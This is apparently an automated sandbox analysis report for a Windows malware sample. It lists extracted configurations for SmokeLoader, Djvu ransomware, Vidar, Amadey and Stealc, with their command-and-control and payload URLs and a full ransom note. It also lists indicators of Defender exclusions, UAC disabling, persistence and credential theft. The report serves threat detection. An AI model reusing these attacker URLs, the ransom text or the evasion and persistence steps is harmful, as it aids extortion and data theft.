Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
16/03/2024, 22:45
Static task
static1
Behavioral task
behavioral1
Sample
a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe
Resource
win10v2004-20240226-en
General
-
Target
a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe
-
Size
223KB
-
MD5
1daf51676edf7053884f8643c1a126de
-
SHA1
865000f10c6395f072e9afa628a4a9b6abbd5e35
-
SHA256
a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669
-
SHA512
199aba789dbc8962a90651cb91c89cd37c38f34282fdb9df6836803602830285a69be18dc7cbb78c2223b181a09afedd721a73993552aff313450bfde60a30b1
-
SSDEEP
3072:Dxs+8iOxvXPIi/RedDfqRvPLXUC0TbML1P4kAu8TMGIn:DxsBfJXPLRedDqZU/AL1ZAuwnS
Malware Config
Extracted
smokeloader
pub1
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Extracted
djvu
http://sajdfue.com/test1/get.php
-
extension
.vook
-
offline_id
1eSPzWRaNslCgtjBZfL5pzvovoiaVI4IZSnvAwt1
-
payload_url
http://sdfjhuz.com/dl/build2.exe
http://sajdfue.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1 Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0857PsawqS
Extracted
vidar
8.3
82df9629d6ef6fc7fe54d6eb2bc6137b
https://steamcommunity.com/profiles/76561199651834633
https://t.me/raf6ik
-
profile_id_v2
82df9629d6ef6fc7fe54d6eb2bc6137b
-
user_agent
Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Extracted
amadey
4.18
http://5.42.64.44
-
install_dir
33945c4f34
-
install_file
Dctooux.exe
-
strings_key
c2f02f09a0f4b3b5748b3f5cd4fe9125
-
url_paths
/BlsSwk93eX/index.php
Extracted
stealc
http://185.172.128.145
-
url_path
/3cd2b41cbde8fc9c.php
Signatures
-
DcRat 12 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vFdRDjouJIdySq9zxNInUrO3.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yefnsn5Sesl78n0BQmatqEb2.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xS4WE8BG9R5BRBmb5Nf0l5gY.bat installutil.exe Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ec623f55-8e6c-4e0f-987d-fd54a5ff2c76\\7C14.exe\" --AutoStart" 7C14.exe 1680 schtasks.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ft8SMkhawRJ68t6lAvElqSEC.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4xjLoCkU1xSowCzwsXH02WDz.bat installutil.exe 2708 schtasks.exe 1360 schtasks.exe 2948 schtasks.exe 960 schtasks.exe -
Detect Vidar Stealer 5 IoCs
resource yara_rule behavioral1/memory/1980-110-0x0000000000400000-0x0000000000644000-memory.dmp family_vidar_v7 behavioral1/memory/2244-112-0x00000000003A0000-0x00000000003D1000-memory.dmp family_vidar_v7 behavioral1/memory/1980-115-0x0000000000400000-0x0000000000644000-memory.dmp family_vidar_v7 behavioral1/memory/1980-116-0x0000000000400000-0x0000000000644000-memory.dmp family_vidar_v7 behavioral1/memory/1980-181-0x0000000000400000-0x0000000000644000-memory.dmp family_vidar_v7 -
Detected Djvu ransomware 14 IoCs
resource yara_rule behavioral1/memory/2752-28-0x0000000001DD0000-0x0000000001EEB000-memory.dmp family_djvu behavioral1/memory/760-33-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/760-36-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/760-37-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/760-60-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1996-70-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1996-71-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1996-86-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1996-87-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1996-91-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1996-93-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1996-94-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1996-117-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1996-130-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba payload 6 IoCs
resource yara_rule behavioral1/memory/2684-689-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2684-693-0x0000000002B50000-0x000000000343B000-memory.dmp family_glupteba behavioral1/memory/2684-763-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2752-811-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2752-819-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1196-903-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9091.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\jK1HRDZ3A7KLdSimVOnZ4RqI.exe = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe -
Detect binaries embedding considerable number of MFA browser extension IDs. 2 IoCs
resource yara_rule behavioral1/memory/1836-833-0x0000000000710000-0x0000000000810000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs behavioral1/memory/1836-834-0x0000000000400000-0x000000000063B000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs -
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 2 IoCs
resource yara_rule behavioral1/memory/1836-833-0x0000000000710000-0x0000000000810000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs behavioral1/memory/1836-834-0x0000000000400000-0x000000000063B000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs -
Detects Windows executables referencing non-Windows User-Agents 5 IoCs
resource yara_rule behavioral1/memory/2684-689-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/2684-763-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/2752-811-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/2752-819-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/1196-903-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
resource yara_rule behavioral1/memory/1836-834-0x0000000000400000-0x000000000063B000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 4 IoCs
resource yara_rule behavioral1/memory/1980-110-0x0000000000400000-0x0000000000644000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL behavioral1/memory/1980-115-0x0000000000400000-0x0000000000644000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL behavioral1/memory/1980-116-0x0000000000400000-0x0000000000644000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL behavioral1/memory/1980-181-0x0000000000400000-0x0000000000644000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL -
Detects executables (downlaoders) containing URLs to raw contents of a paste 1 IoCs
resource yara_rule behavioral1/memory/2956-293-0x0000000000400000-0x0000000000408000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawPaste_URL -
Detects executables Discord URL observed in first stage droppers 5 IoCs
resource yara_rule behavioral1/memory/2684-689-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral1/memory/2684-763-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral1/memory/2752-811-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral1/memory/2752-819-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral1/memory/1196-903-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL -
Detects executables containing URLs to raw contents of a Github gist 5 IoCs
resource yara_rule behavioral1/memory/2684-689-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral1/memory/2684-763-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral1/memory/2752-811-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral1/memory/2752-819-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral1/memory/1196-903-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL -
Detects executables containing artifacts associated with disabling Widnows Defender 5 IoCs
resource yara_rule behavioral1/memory/2684-689-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral1/memory/2684-763-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral1/memory/2752-811-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral1/memory/2752-819-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral1/memory/1196-903-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender -
Detects executables packed with or use KoiVM 1 IoCs
resource yara_rule behavioral1/memory/2480-267-0x000000001A940000-0x000000001A99C000-memory.dmp INDICATOR_EXE_Packed_KoiVM -
Detects executables referencing many varying, potentially fake Windows User-Agents 5 IoCs
resource yara_rule behavioral1/memory/2684-689-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral1/memory/2684-763-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral1/memory/2752-811-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral1/memory/2752-819-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral1/memory/1196-903-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA -
UPX dump on OEP (original entry point) 2 IoCs
resource yara_rule behavioral1/memory/1636-684-0x0000000000400000-0x0000000000930000-memory.dmp UPX behavioral1/memory/1636-857-0x0000000000400000-0x0000000000930000-memory.dmp UPX -
Downloads MZ/PE file
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2120 netsh.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Deletes itself 1 IoCs
pid Process 1204 Process not Found -
Drops startup file 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yefnsn5Sesl78n0BQmatqEb2.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xS4WE8BG9R5BRBmb5Nf0l5gY.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iaOQ9M3CAm8mGmeVwkJIp6Hr.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skfBPwwCEgqET13E8RC7aTej.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4fNjz6LB1mtmza4zo11MIPRV.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vFdRDjouJIdySq9zxNInUrO3.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ft8SMkhawRJ68t6lAvElqSEC.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4xjLoCkU1xSowCzwsXH02WDz.bat installutil.exe -
Executes dropped EXE 29 IoCs
pid Process 2752 7C14.exe 760 7C14.exe 2884 7C14.exe 1996 7C14.exe 2244 build2.exe 1980 build2.exe 1312 D9A.exe 2740 21B8.exe 2480 9091.exe 2928 srWVeTGyzLkwwb1QBfnCcXzi.exe 2684 jK1HRDZ3A7KLdSimVOnZ4RqI.exe 1876 LyBen0R1Ao7idDzHyT9c1Fzu.exe 2336 LyBen0R1Ao7idDzHyT9c1Fzu.tmp 1992 pWBGIfEREWc5oWoEmV5UenVZ.exe 1836 syncUpd.exe 1636 BroomSetup.exe 1008 XbHzqb0as03VeT1jmorU5VXk.exe 2928 SIiXbH2AtpQ6J1Xgu1diXRQ5.exe 2256 wfplwfs.exe 2752 jK1HRDZ3A7KLdSimVOnZ4RqI.exe 1196 csrss.exe 1784 Qg3s6nUq4KhkqbjIvrPmo7HO.exe 2472 GIJECGDGCB.exe 500 Install.exe 1764 Install.exe 572 patch.exe 2924 injector.exe 2460 windefender.exe 484 windefender.exe -
Loads dropped DLL 64 IoCs
pid Process 2752 7C14.exe 760 7C14.exe 760 7C14.exe 2884 7C14.exe 1996 7C14.exe 1996 7C14.exe 568 WerFault.exe 568 WerFault.exe 568 WerFault.exe 568 WerFault.exe 2600 WerFault.exe 2600 WerFault.exe 2600 WerFault.exe 1204 Process not Found 1204 Process not Found 2260 WerFault.exe 2260 WerFault.exe 2260 WerFault.exe 2260 WerFault.exe 2260 WerFault.exe 2956 installutil.exe 2956 installutil.exe 2956 installutil.exe 2956 installutil.exe 1876 LyBen0R1Ao7idDzHyT9c1Fzu.exe 2336 LyBen0R1Ao7idDzHyT9c1Fzu.tmp 2336 LyBen0R1Ao7idDzHyT9c1Fzu.tmp 2336 LyBen0R1Ao7idDzHyT9c1Fzu.tmp 2956 installutil.exe 1992 pWBGIfEREWc5oWoEmV5UenVZ.exe 1992 pWBGIfEREWc5oWoEmV5UenVZ.exe 1992 pWBGIfEREWc5oWoEmV5UenVZ.exe 1992 pWBGIfEREWc5oWoEmV5UenVZ.exe 1992 pWBGIfEREWc5oWoEmV5UenVZ.exe 2956 installutil.exe 2956 installutil.exe 2956 installutil.exe 2928 SIiXbH2AtpQ6J1Xgu1diXRQ5.exe 1836 syncUpd.exe 1836 syncUpd.exe 2752 jK1HRDZ3A7KLdSimVOnZ4RqI.exe 2752 jK1HRDZ3A7KLdSimVOnZ4RqI.exe 2956 installutil.exe 1784 Qg3s6nUq4KhkqbjIvrPmo7HO.exe 1784 Qg3s6nUq4KhkqbjIvrPmo7HO.exe 1784 Qg3s6nUq4KhkqbjIvrPmo7HO.exe 2880 cmd.exe 1784 Qg3s6nUq4KhkqbjIvrPmo7HO.exe 500 Install.exe 500 Install.exe 500 Install.exe 500 Install.exe 1764 Install.exe 1764 Install.exe 1764 Install.exe 860 Process not Found 572 patch.exe 572 patch.exe 572 patch.exe 572 patch.exe 572 patch.exe 1196 csrss.exe 572 patch.exe 572 patch.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2828 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/1636-684-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral1/memory/1636-857-0x0000000000400000-0x0000000000930000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\jK1HRDZ3A7KLdSimVOnZ4RqI.exe = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" jK1HRDZ3A7KLdSimVOnZ4RqI.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\GIJECGDGCB.exe" GIJECGDGCB.exe Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ec623f55-8e6c-4e0f-987d-fd54a5ff2c76\\7C14.exe\" --AutoStart" 7C14.exe Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" jK1HRDZ3A7KLdSimVOnZ4RqI.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9091.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9091.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 55 pastebin.com 57 pastebin.com 70 bitbucket.org 72 bitbucket.org 41 drive.google.com 42 drive.google.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 api.2ip.ua 8 api.2ip.ua 18 api.2ip.ua -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Modifies boot configuration data using bcdedit 1 IoCs
pid Process 1944 bcdedit.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2752 set thread context of 760 2752 7C14.exe 32 PID 2884 set thread context of 1996 2884 7C14.exe 36 PID 2244 set thread context of 1980 2244 build2.exe 39 PID 2480 set thread context of 2956 2480 9091.exe 56 PID 2256 set thread context of 2796 2256 wfplwfs.exe 80 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN jK1HRDZ3A7KLdSimVOnZ4RqI.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\Tasks\f3e7edc854e23b3d.job wfplwfs.exe File opened for modification C:\Windows\rss jK1HRDZ3A7KLdSimVOnZ4RqI.exe File created C:\Windows\rss\csrss.exe jK1HRDZ3A7KLdSimVOnZ4RqI.exe File created C:\Windows\Logs\CBS\CbsPersist_20240316224738.cab makecab.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\bVJltUxuNruTzSXcXP.job schtasks.exe File created C:\Windows\Tasks\Dctooux.job srWVeTGyzLkwwb1QBfnCcXzi.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2712 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 568 1980 WerFault.exe 39 2600 1312 WerFault.exe 45 -
NSIS installer 1 IoCs
resource yara_rule behavioral1/files/0x0006000000016d32-572.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 syncUpd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString syncUpd.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1680 schtasks.exe 2708 schtasks.exe 1360 schtasks.exe 2948 schtasks.exe 960 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local 